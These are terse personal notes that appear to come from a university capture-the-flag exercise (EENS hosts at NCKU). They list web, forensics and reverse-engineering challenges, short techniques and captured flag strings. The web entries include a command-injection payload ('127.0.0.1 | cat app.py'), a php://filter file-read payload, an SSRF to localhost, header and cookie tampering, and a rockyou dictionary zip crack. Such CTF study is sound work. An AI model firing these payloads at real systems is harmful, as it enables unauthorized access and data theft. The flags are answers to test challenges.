http://eens.ee.ncku.edu.tw:5104/
127.0.0.1 | cat app.py
ping
的網址的input127.0.0.1 | ls
確定可以用 pipeline |
繞過flag
EENS{4fbaf3a4a7abdb459fc4f95fcbafb2dae920132583862c08eb4403037606e708}
bypass
eens.ee.ncku.edu.tw:5006
php://filter/read=convert.base64-encode/resource=index.php
EENS{3ccbd7b55e67a09bc085e32f6a79e2cfdfe03e8525ae2e27c92a646c679bf00c}
pseudo protocol
php
EENS{868ff5b3432facbfab5a5657aaaf7f96301b673acb532236398e1d05b26380c6}
Header
X-Forwarded-For
Burp suite
http://eens.ee.ncku.edu.tw:5101
EENS{cf2d891cb01a75a806ca50d6d5cb3f7af532534bb649ab1fa1f11464982419f8}
sql injection
bypass
http://127.0.0.1
EENS{ae852e946757b0a32f386aeba991abae99c25d3ed4514fd1dfe0ebe43ab653c6}
ssrf
http://eens.ee.ncku.edu.tw:5102
burp suit
user
to admin
EENS{35ee65df86b64dbb411fa3b6b803117844819e12f8372ebec139107738527506}
cookie
burp suite
EENS{HeL10_C7f}
strings rn.png
EENS{Senbonzakura_Kageyoshi}
strings
echo "1" - | nc 140.116.215.203 5001
EENS{974c7afceb5175b6b17ae7017827b6a6e8027c172dcb80cf53e52829f9cd222a}
EENS{VIGENERE CIPHER IS A PAIN IN THE ASS IF YOU DONT USE ONLINE TOOLS}
EENS{이것이 나의 첫 CTF입니다}
EENS{7his_Is_a_Simp1e_Buffer_0VERF1ow_practice.}
overflow
EENS{a52e4d6f04166133d4e3e70aeec1e393d6c8dafdd0de138c51cf7be64483ffb6}
a.out
ghidra
: find a scores
symbolgdb
EENS{Be_Patient_AND_ENJOY_THIS_GAME!!!!}
ghidra
gdb
reverse
hexdump flag.png
-> 89 50 55 47
89 50 4E 47
get a QRCODE: RUVOU3tsYXM7ZG4sbXp3a2VqdGtzenguY252enhjdn0=
flag: EENS{las;dn,mzwkejtkszx.cnvzxcv}
forensics
magic number
EENS{Th3r3_ls_th3_FIag_TEN50fTHOUSAND50f_STAGE5_AND_1I11l1ll1l1l1ll1lIIll1III1}
EENS{Not_only_block_can_chain}
exploit
https://github.com/Ethonwu/Zip-file-crack-using-dictionary
rockyou.txt
zxcvbnm
flag: EENS{Whether_'tis_nobler_in_the_mind_to_suffer}